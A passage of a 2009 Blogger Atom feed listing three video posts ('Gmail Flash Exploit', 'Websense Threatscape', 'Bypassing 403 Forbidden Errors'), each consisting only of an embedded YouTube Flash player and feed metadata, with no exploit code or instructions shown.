width=&quot;320&quot; height=&quot;265&quot;&gt;&lt;param name=&quot;movie&quot; value=&quot;http://www.youtube.com/v/doPpsU91j7k&amp;hl=en_GB&amp;fs=1&amp;rel=0&amp;color1=0x3a3a3a&amp;color2=0x999999&quot;&gt;&lt;/param&gt;&lt;param name=&quot;allowFullScreen&quot; value=&quot;true&quot;&gt;&lt;/param&gt;&lt;param name=&quot;allowscriptaccess&quot; value=&quot;always&quot;&gt;&lt;/param&gt;&lt;embed src=&quot;http://www.youtube.com/v/doPpsU91j7k&amp;hl=en_GB&amp;fs=1&amp;rel=0&amp;color1=0x3a3a3a&amp;color2=0x999999&quot; type=&quot;application/x-shockwave-flash&quot; allowscriptaccess=&quot;always&quot; allowfullscreen=&quot;true&quot; width=&quot;320&quot; height=&quot;265&quot;&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;
&lt;br /&gt;
# ITS ©&lt;br /&gt;
# 2008 - 2009</content><link rel='replies' type='application/atom+xml' href='http://bukibv.blogspot.com/feeds/4224621903270930798/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bukibv.blogspot.com/2009/11/gmail-flash-exploit.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/4224621903270930798'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/4224621903270930798'/><link rel='alternate' type='text/html' href='http://bukibv.blogspot.com/2009/11/gmail-flash-exploit.html' title='Gmail Flash Exploit'/><author><name>bi0</name><uri>http://www.blogger.com/profile/14620421761593085083</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgev5ERfeuQHk5ImsapFVR-TxsvBa7tFX4MXU7RG2P0dY87L4OVDZdv-bg73Hy1OBRgQzphIYOp7uUHeR9zrz6QJrFFRPsMKboVuKfeXU3oTkcQ7EnFas6v9P-mdrfsMgI/s1600/*'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2408596200810928464.post-1935036870816167530</id><published>2009-11-13T00:53:00.000-08:00</published><updated>2009-11-13T00:53:24.290-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Facebook"/><title type='text'>Websense Threatscape</title><content type='html'>&lt;object width=&quot;480&quot; height=&quot;295&quot;&gt;&lt;param name=&quot;movie&quot; value=&quot;http://www.youtube.com/v/A8rDkA3dTV0&amp;hl=en_US&amp;fs=1&amp;rel=0&amp;color1=0x3a3a3a&amp;color2=0x999999&quot;&gt;&lt;/param&gt;&lt;param name=&quot;allowFullScreen&quot; value=&quot;true&quot;&gt;&lt;/param&gt;&lt;param name=&quot;allowscriptaccess&quot; value=&quot;always&quot;&gt;&lt;/param&gt;&lt;embed src=&quot;http://www.youtube.com/v/A8rDkA3dTV0&amp;hl=en_US&amp;fs=1&amp;rel=0&amp;color1=0x3a3a3a&amp;color2=0x999999&quot; type=&quot;application/x-shockwave-flash&quot; allowscriptaccess=&quot;always&quot; allowfullscreen=&quot;true&quot; width=&quot;480&quot; height=&quot;295&quot;&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;
&lt;br /&gt;
# ITS ©&lt;br /&gt;
# 2008 - 2009</content><link rel='replies' type='application/atom+xml' href='http://bukibv.blogspot.com/feeds/1935036870816167530/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bukibv.blogspot.com/2009/11/websense-threatscape.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/1935036870816167530'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/1935036870816167530'/><link rel='alternate' type='text/html' href='http://bukibv.blogspot.com/2009/11/websense-threatscape.html' title='Websense Threatscape'/><author><name>bi0</name><uri>http://www.blogger.com/profile/14620421761593085083</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgev5ERfeuQHk5ImsapFVR-TxsvBa7tFX4MXU7RG2P0dY87L4OVDZdv-bg73Hy1OBRgQzphIYOp7uUHeR9zrz6QJrFFRPsMKboVuKfeXU3oTkcQ7EnFas6v9P-mdrfsMgI/s1600/*'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2408596200810928464.post-2155920242357548000</id><published>2009-11-13T00:50:00.000-08:00</published><updated>2009-11-13T00:50:32.151-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Bypassing 403 Forbidden Errors"/><title type='text'>Bypassing 403 Forbidden Errors</title><content type='html'>&lt;object width=&quot;480&quot; height=&quot;295&quot;&gt;&lt;param name=&quot;movie&quot; value=&quot;http://www.youtube.com/v/HhAXD4IvU7k&amp;hl=en_US&amp;fs=1&amp;rel=0&amp;color1=0x3a3a3a&amp;color2=0x999999&quot;&gt;&lt;/param&gt;&lt;param name=&quot;allowFullScreen&quot; value=&quot;true&quot;&gt;&lt;/param&gt;&lt;param name=&quot;allowscriptaccess&quot; value=&quot;always&quot;&gt;&lt;/param&gt;&lt;embed src=&quot;http://www.youtube.com/v/HhAXD4IvU7k&amp;hl=en_US&amp;fs=1&amp;rel=0&amp;color1=0x3a3a3a&amp;color2=0x999999&quot; type=&quot;application/x-shockwave-flash&quot; allowscriptaccess=&quot;always&quot; allowfullscreen=&quot;true&quot; width=&quot;480&quot; height=&quot;295&quot;&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;
&lt;br /&gt;
# ITS ©&lt;br /&gt;
# 2008 - 2009</content><link rel='replies' type='application/atom+xml' href='http://bukibv.blogspot.com/feeds/2155920242357548000/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bukibv.blogspot.com/2009/11/bypassing-403-forbidden-errors.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/2155920242357548000'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/2155920242357548000'/><link rel='alternate' type='text/html' href='http://bukibv.blogspot.com/2009/11/bypassing-403-forbidden-errors.html' title='Bypassing 403 Forbidden Errors'/><author><name>bi0</name><uri>http://www.blogger.com/profile/14620421761593085083</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgev5ERfeuQHk5ImsapFVR-TxsvBa7tFX4MXU7RG2P0dY87L4OVDZdv-bg73Hy1OBRgQzphIYOp7uUHeR9zrz6QJrFFRPsMKboVuKfeXU3oTkcQ7EnFas6v9P-mdrfsMgI/s1600/*'/></author><thr:total>0</thr:total></entry></feed>